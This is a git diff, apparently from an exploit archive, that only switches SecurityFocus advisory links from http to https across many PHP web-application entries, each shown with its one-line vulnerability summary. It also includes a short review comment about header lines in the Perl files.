diff --git a/exploits/php/webapps/28741.txt b/exploits/php/webapps/28741.txt index 3bf14c445..d9d91bb11 100644 --- a/exploits/php/webapps/28741.txt +++ b/exploits/php/webapps/28741.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20333/info +source: https://www.securityfocus.com/bid/20333/info Yener Haber Script is prone to an SQL-injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/28743.txt b/exploits/php/webapps/28743.txt index f5fa92a14..9b82cceb0 100644 --- a/exploits/php/webapps/28743.txt +++ b/exploits/php/webapps/28743.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28744.txt b/exploits/php/webapps/28744.txt index 1f78c12c1..2ebe7e23a 100644 --- a/exploits/php/webapps/28744.txt +++ b/exploits/php/webapps/28744.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28745.txt b/exploits/php/webapps/28745.txt index bb4842210..fd67a4069 100644 --- a/exploits/php/webapps/28745.txt +++ b/exploits/php/webapps/28745.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28746.txt b/exploits/php/webapps/28746.txt index e28213fc1..80023ed2d 100644 --- a/exploits/php/webapps/28746.txt +++ b/exploits/php/webapps/28746.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28747.txt b/exploits/php/webapps/28747.txt index c25834ebd..290325eba 100644 --- a/exploits/php/webapps/28747.txt +++ b/exploits/php/webapps/28747.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28748.txt b/exploits/php/webapps/28748.txt index 82802b4d3..625992e4b 100644 --- a/exploits/php/webapps/28748.txt +++ b/exploits/php/webapps/28748.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28749.txt b/exploits/php/webapps/28749.txt index f2a774a3b..dcd240baf 100644 --- a/exploits/php/webapps/28749.txt +++ b/exploits/php/webapps/28749.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28750.txt b/exploits/php/webapps/28750.txt index f163fc91f..704e24352 100644 --- a/exploits/php/webapps/28750.txt +++ b/exploits/php/webapps/28750.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28751.txt b/exploits/php/webapps/28751.txt index 8c523fef0..315958baf 100644 --- a/exploits/php/webapps/28751.txt +++ b/exploits/php/webapps/28751.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28752.txt b/exploits/php/webapps/28752.txt index 47744d33e..89c615916 100644 --- a/exploits/php/webapps/28752.txt +++ b/exploits/php/webapps/28752.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28753.txt b/exploits/php/webapps/28753.txt index 04dcb3309..5bbd1d0e4 100644 --- a/exploits/php/webapps/28753.txt +++ b/exploits/php/webapps/28753.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28754.txt b/exploits/php/webapps/28754.txt index d250880d3..8a1c34cc9 100644 --- a/exploits/php/webapps/28754.txt +++ b/exploits/php/webapps/28754.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28755.txt b/exploits/php/webapps/28755.txt index ef4b618bf..586662c94 100644 --- a/exploits/php/webapps/28755.txt +++ b/exploits/php/webapps/28755.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28756.txt b/exploits/php/webapps/28756.txt index fb5929d12..a117b86b9 100644 --- a/exploits/php/webapps/28756.txt +++ b/exploits/php/webapps/28756.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28757.txt b/exploits/php/webapps/28757.txt index 8057862bd..91ba7de90 100644 --- a/exploits/php/webapps/28757.txt +++ b/exploits/php/webapps/28757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28758.txt b/exploits/php/webapps/28758.txt index 34f5bc399..903de79cb 100644 --- a/exploits/php/webapps/28758.txt +++ b/exploits/php/webapps/28758.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28759.txt b/exploits/php/webapps/28759.txt index b64f2132f..1c106b7e9 100644 --- a/exploits/php/webapps/28759.txt +++ b/exploits/php/webapps/28759.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20343/info +source: https://www.securityfocus.com/bid/20343/info osCommerce is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28761.txt b/exploits/php/webapps/28761.txt index dc3786286..783ad0831 100644 --- a/exploits/php/webapps/28761.txt +++ b/exploits/php/webapps/28761.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20350/info +source: https://www.securityfocus.com/bid/20350/info WikyBlog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28767.txt b/exploits/php/webapps/28767.txt index 3153b728b..74700e230 100644 --- a/exploits/php/webapps/28767.txt +++ b/exploits/php/webapps/28767.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20372/info +source: https://www.securityfocus.com/bid/20372/info ackerTodo is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/28769.txt b/exploits/php/webapps/28769.txt index 4d66a4f6b..5fbb8fd40 100644 --- a/exploits/php/webapps/28769.txt +++ b/exploits/php/webapps/28769.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20380/info +source: https://www.securityfocus.com/bid/20380/info Interspire FastFind is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28770.txt b/exploits/php/webapps/28770.txt index 065004cec..0a033e5cf 100644 --- a/exploits/php/webapps/28770.txt +++ b/exploits/php/webapps/28770.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20395/info +source: https://www.securityfocus.com/bid/20395/info Moodle is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28771.pl b/exploits/php/webapps/28771.pl index e3b14b478..3f0fcee42 100755 --- a/exploits/php/webapps/28771.pl +++ b/exploits/php/webapps/28771.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20398/info +source: https://www.securityfocus.com/bid/20398/info PHP Polling Creator is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28772.txt b/exploits/php/webapps/28772.txt index c8262a7e0..74d910f3d 100644 --- a/exploits/php/webapps/28772.txt +++ b/exploits/php/webapps/28772.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20401/info +source: https://www.securityfocus.com/bid/20401/info iSearch is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28773.txt b/exploits/php/webapps/28773.txt index 62a5a5b4f..72a11a15d 100644 --- a/exploits/php/webapps/28773.txt +++ b/exploits/php/webapps/28773.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20402/info +source: https://www.securityfocus.com/bid/20402/info Deep CMS is affected by a remote file-include vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28774.txt b/exploits/php/webapps/28774.txt index 507be6b1c..8d894a634 100644 --- a/exploits/php/webapps/28774.txt +++ b/exploits/php/webapps/28774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20412/info +source: https://www.securityfocus.com/bid/20412/info phpWebSite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28776.txt b/exploits/php/webapps/28776.txt index 93e3358a3..788c31bf7 100644 --- a/exploits/php/webapps/28776.txt +++ b/exploits/php/webapps/28776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20420/info +source: https://www.securityfocus.com/bid/20420/info eXpBlog is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/28777.txt b/exploits/php/webapps/28777.txt index 6cf2dbf4d..a7fed78b4 100644 --- a/exploits/php/webapps/28777.txt +++ b/exploits/php/webapps/28777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20424/info +source: https://www.securityfocus.com/bid/20424/info Hastymail is prone to an IMAP / SMTP command-injection vulnerability because it fails to sufficiently sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28778.txt b/exploits/php/webapps/28778.txt index 614d34039..c0e49dc45 100644 --- a/exploits/php/webapps/28778.txt +++ b/exploits/php/webapps/28778.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20436/info +source: https://www.securityfocus.com/bid/20436/info IronWebMail is prone to a remote information-disclosure vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28779.txt b/exploits/php/webapps/28779.txt index 99ba59280..19691de3a 100644 --- a/exploits/php/webapps/28779.txt +++ b/exploits/php/webapps/28779.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20441/info +source: https://www.securityfocus.com/bid/20441/info Album Photo Sans Nom is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28780.txt b/exploits/php/webapps/28780.txt index d31944c44..c5f63002a 100644 --- a/exploits/php/webapps/28780.txt +++ b/exploits/php/webapps/28780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20442/info +source: https://www.securityfocus.com/bid/20442/info Softerra PHP Developer Library is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28781.txt b/exploits/php/webapps/28781.txt index 14f5feacd..6081ee4c9 100644 --- a/exploits/php/webapps/28781.txt +++ b/exploits/php/webapps/28781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20450/info +source: https://www.securityfocus.com/bid/20450/info BlueShoes Framework is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28782.txt b/exploits/php/webapps/28782.txt index 9dfb6a160..19794845b 100644 --- a/exploits/php/webapps/28782.txt +++ b/exploits/php/webapps/28782.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20451/info +source: https://www.securityfocus.com/bid/20451/info Tagit2b is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28783.txt b/exploits/php/webapps/28783.txt index c987823b3..25b76b54a 100644 --- a/exploits/php/webapps/28783.txt +++ b/exploits/php/webapps/28783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20460/info +source: https://www.securityfocus.com/bid/20460/info MySQLDumper is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28784.txt b/exploits/php/webapps/28784.txt index 4b5951927..93e11e3aa 100644 --- a/exploits/php/webapps/28784.txt +++ b/exploits/php/webapps/28784.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20461/info +source: https://www.securityfocus.com/bid/20461/info gcards is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28786.pl b/exploits/php/webapps/28786.pl index 6fe8e2260..1e53ccc16 100755 --- a/exploits/php/webapps/28786.pl +++ b/exploits/php/webapps/28786.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20466/info +source: https://www.securityfocus.com/bid/20466/info CommunityPortals is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28787.txt b/exploits/php/webapps/28787.txt index 188a21ca6..9383e3e15 100644 --- a/exploits/php/webapps/28787.txt +++ b/exploits/php/webapps/28787.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20468/info +source: https://www.securityfocus.com/bid/20468/info Dokeos is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28790.txt b/exploits/php/webapps/28790.txt index f58d0af5a..e66bfb4c5 100644 --- a/exploits/php/webapps/28790.txt +++ b/exploits/php/webapps/28790.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20483/info +source: https://www.securityfocus.com/bid/20483/info phpList is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28791.txt b/exploits/php/webapps/28791.txt index 8349a4216..03dc02497 100644 --- a/exploits/php/webapps/28791.txt +++ b/exploits/php/webapps/28791.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20486/info +source: https://www.securityfocus.com/bid/20486/info PHP TopSites is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/php/webapps/28792.txt b/exploits/php/webapps/28792.txt index 697d679ab..aeca4620a 100644 --- a/exploits/php/webapps/28792.txt +++ b/exploits/php/webapps/28792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20487/info +source: https://www.securityfocus.com/bid/20487/info ExtCalThai is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28793.txt b/exploits/php/webapps/28793.txt index e3205062b..8287a70a2 100644 --- a/exploits/php/webapps/28793.txt +++ b/exploits/php/webapps/28793.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20487/info +source: https://www.securityfocus.com/bid/20487/info ExtCalThai is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28794.txt b/exploits/php/webapps/28794.txt index 0302e8ec3..6aad85258 100644 --- a/exploits/php/webapps/28794.txt +++ b/exploits/php/webapps/28794.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20488/info +source: https://www.securityfocus.com/bid/20488/info 4images is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28795.php b/exploits/php/webapps/28795.php index 0de03451a..9aeebe164 100644 --- a/exploits/php/webapps/28795.php +++ b/exploits/php/webapps/28795.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20494/info +source: https://www.securityfocus.com/bid/20494/info FreeWPS is prone to a remote command-execution vulnerability. diff --git a/exploits/php/webapps/28796.pl b/exploits/php/webapps/28796.pl index 2cbb18c19..3af4eec96 100755 --- a/exploits/php/webapps/28796.pl +++ b/exploits/php/webapps/28796.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20511/info +source: https://www.securityfocus.com/bid/20511/info Buzlas is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28797.txt b/exploits/php/webapps/28797.txt index b9ecbad58..a0d8a34df 100644 --- a/exploits/php/webapps/28797.txt +++ b/exploits/php/webapps/28797.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. 
diff --git a/exploits/php/webapps/28798.txt b/exploits/php/webapps/28798.txt index 846167114..cb991da1b 100644 --- a/exploits/php/webapps/28798.txt +++ b/exploits/php/webapps/28798.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28799.txt b/exploits/php/webapps/28799.txt index 48c36b3c5..0f416fe79 100644 --- a/exploits/php/webapps/28799.txt +++ b/exploits/php/webapps/28799.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28800.txt b/exploits/php/webapps/28800.txt index 58d781975..a7b3e965a 100644 --- a/exploits/php/webapps/28800.txt +++ b/exploits/php/webapps/28800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28801.txt b/exploits/php/webapps/28801.txt index 5341f57ad..eac9e72cd 100644 --- a/exploits/php/webapps/28801.txt +++ b/exploits/php/webapps/28801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28802.txt b/exploits/php/webapps/28802.txt index f2f7e2150..4d2dc713f 100644 --- a/exploits/php/webapps/28802.txt +++ b/exploits/php/webapps/28802.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20512/info +source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28803.txt b/exploits/php/webapps/28803.txt index 8f5b199b1..ef055d0b9 100644 --- a/exploits/php/webapps/28803.txt +++ b/exploits/php/webapps/28803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20514/info +source: https://www.securityfocus.com/bid/20514/info Xoops is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28804.pl b/exploits/php/webapps/28804.pl index 53c384b97..6ee97514d 100755 --- a/exploits/php/webapps/28804.pl +++ b/exploits/php/webapps/28804.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20516/info +source: https://www.securityfocus.com/bid/20516/info The Add Name component for phpBB is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28814.txt b/exploits/php/webapps/28814.txt index 669a33d99..8772765c8 100644 --- a/exploits/php/webapps/28814.txt +++ b/exploits/php/webapps/28814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20523/info +source: https://www.securityfocus.com/bid/20523/info RamaCMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28815.txt b/exploits/php/webapps/28815.txt index 228ada52c..b5e5a71a5 100644 --- a/exploits/php/webapps/28815.txt +++ b/exploits/php/webapps/28815.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20532/info +source: https://www.securityfocus.com/bid/20532/info H-Sphere WebShell is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/28818.txt b/exploits/php/webapps/28818.txt index 5970502b0..30a66e5e9 100644 --- a/exploits/php/webapps/28818.txt +++ b/exploits/php/webapps/28818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20549/info +source: https://www.securityfocus.com/bid/20549/info Mambo MostlyCE is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28819.txt b/exploits/php/webapps/28819.txt index 7e3d9087f..acbededd4 100644 --- a/exploits/php/webapps/28819.txt +++ b/exploits/php/webapps/28819.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20551/info +source: https://www.securityfocus.com/bid/20551/info Lodel CMS is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28820.txt b/exploits/php/webapps/28820.txt index 6a4d26ed5..890a5217a 100644 --- a/exploits/php/webapps/28820.txt +++ b/exploits/php/webapps/28820.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20554/info +source: https://www.securityfocus.com/bid/20554/info GOOP Gallery is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28821.txt b/exploits/php/webapps/28821.txt index 391f7ea7b..fc1da8d17 100644 --- a/exploits/php/webapps/28821.txt +++ b/exploits/php/webapps/28821.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20560/info +source: https://www.securityfocus.com/bid/20560/info Maintain is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28823.pl b/exploits/php/webapps/28823.pl index 4a94d2f08..8b84dbb47 100755 --- a/exploits/php/webapps/28823.pl +++ b/exploits/php/webapps/28823.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20564/info +source: https://www.securityfocus.com/bid/20564/info PowerMovieList is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/28824.txt b/exploits/php/webapps/28824.txt index c326603e5..0589ae94d 100644 --- a/exploits/php/webapps/28824.txt +++ b/exploits/php/webapps/28824.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20577/info +source: https://www.securityfocus.com/bid/20577/info PHPList is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28825.txt b/exploits/php/webapps/28825.txt index 39f58b862..ae449b649 100644 --- a/exploits/php/webapps/28825.txt +++ b/exploits/php/webapps/28825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20590/info +source: https://www.securityfocus.com/bid/20590/info DEV Web Manager System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/28826.txt b/exploits/php/webapps/28826.txt index 559304ffa..866dbd8c8 100644 --- a/exploits/php/webapps/28826.txt +++ b/exploits/php/webapps/28826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20598/info +source: https://www.securityfocus.com/bid/20598/info Cerberus Helpdesk is prone to an unauthorized-access vulnerability because the application fails to authenticate users properly, resulting in an improper-access validation. A workaround is available. diff --git a/exploits/php/webapps/28827.txt b/exploits/php/webapps/28827.txt index b4fed6e42..6bf1dca0c 100644 --- a/exploits/php/webapps/28827.txt +++ b/exploits/php/webapps/28827.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20603/info +source: https://www.securityfocus.com/bid/20603/info PHP Live Helper is prone to multiple remote file-include vulnerabilities. diff --git a/exploits/php/webapps/28828.txt b/exploits/php/webapps/28828.txt index 27d703399..c5c7b279e 100644 --- a/exploits/php/webapps/28828.txt +++ b/exploits/php/webapps/28828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20606/info +source: https://www.securityfocus.com/bid/20606/info Zorum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28830.pl b/exploits/php/webapps/28830.pl index 663f2f3a1..2009f711f 100755 --- a/exploits/php/webapps/28830.pl +++ b/exploits/php/webapps/28830.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20621/info +source: https://www.securityfocus.com/bid/20621/info Free Faq is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28831.txt b/exploits/php/webapps/28831.txt index 54c3cb6bc..ebbb6384e 100644 --- a/exploits/php/webapps/28831.txt +++ b/exploits/php/webapps/28831.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20629/info +source: https://www.securityfocus.com/bid/20629/info Simple Machines Forum is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28832.txt b/exploits/php/webapps/28832.txt index ccc6b6f1e..276abce90 100644 --- a/exploits/php/webapps/28832.txt +++ b/exploits/php/webapps/28832.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20634/info +source: https://www.securityfocus.com/bid/20634/info ATutor is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. 
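Review bot: In exploits/php/webapps/28830.pl (mode 100755), and likewise in 28771.pl, 28786.pl, 28796.pl and 28804.pl earlier in this patch, line 1 is the bare `source:` URL followed directly by advisory prose, so a file marked executable starts with neither a shebang nor a comment marker. Since this commit already rewrites that line in every file, consider a follow-up that prefixes the header lines in the Perl files with `#`, so the provenance header is not parsed as code and the URL can be updated mechanically without touching script syntax. The scheme change itself is consistent in the hunks shown: each `-`/`+` pair differs only in `http` versus `https`, and the BID number is the same on both sides.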
diff --git a/exploits/php/webapps/28833.pl b/exploits/php/webapps/28833.pl index 454b93ac8..b49a72ae7 100755 --- a/exploits/php/webapps/28833.pl +++ b/exploits/php/webapps/28833.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20646/info +source: https://www.securityfocus.com/bid/20646/info Casinosoft Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/28838.txt b/exploits/php/webapps/28838.txt index e51735e71..8209253ab 100644 --- a/exploits/php/webapps/28838.txt +++ b/exploits/php/webapps/28838.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20672/info +source: https://www.securityfocus.com/bid/20672/info ClanLite is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/28839.txt b/exploits/php/webapps/28839.txt index dae7e0250..754893fab 100644 --- a/exploits/php/webapps/28839.txt +++ b/exploits/php/webapps/28839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20673/info +source: https://www.securityfocus.com/bid/20673/info SchoolAlumni portal is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include a local file-include vulnerability and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/28840.txt b/exploits/php/webapps/28840.txt index 6f26bab02..6f9b52266 100644 --- a/exploits/php/webapps/28840.txt +++ b/exploits/php/webapps/28840.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20673/info +source: https://www.securityfocus.com/bid/20673/info SchoolAlumni portal is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. These issues include a local file-include vulnerability and a cross-site scripting vulnerability. diff --git a/exploits/php/webapps/28842.txt b/exploits/php/webapps/28842.txt index c119cc877..d5ca5be3c 100644 --- a/exploits/php/webapps/28842.txt +++ b/exploits/php/webapps/28842.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20682/info +source: https://www.securityfocus.com/bid/20682/info Zwahlen's Online Shop is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28843.txt b/exploits/php/webapps/28843.txt index 78a019679..d35cca8b9 100644 --- a/exploits/php/webapps/28843.txt +++ b/exploits/php/webapps/28843.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20683/info +source: https://www.securityfocus.com/bid/20683/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28844.txt b/exploits/php/webapps/28844.txt index 80b399e9e..14f590ee2 100644 --- a/exploits/php/webapps/28844.txt +++ b/exploits/php/webapps/28844.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/20683/info +source: https://www.securityfocus.com/bid/20683/info cPanel is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/28845.txt b/exploits/php/webapps/28845.txt index f49ef7eae..69a098d22 100644 --- a/exploits/php/webapps/28845.txt +++ b/exploits/php/webapps/28845.txt 
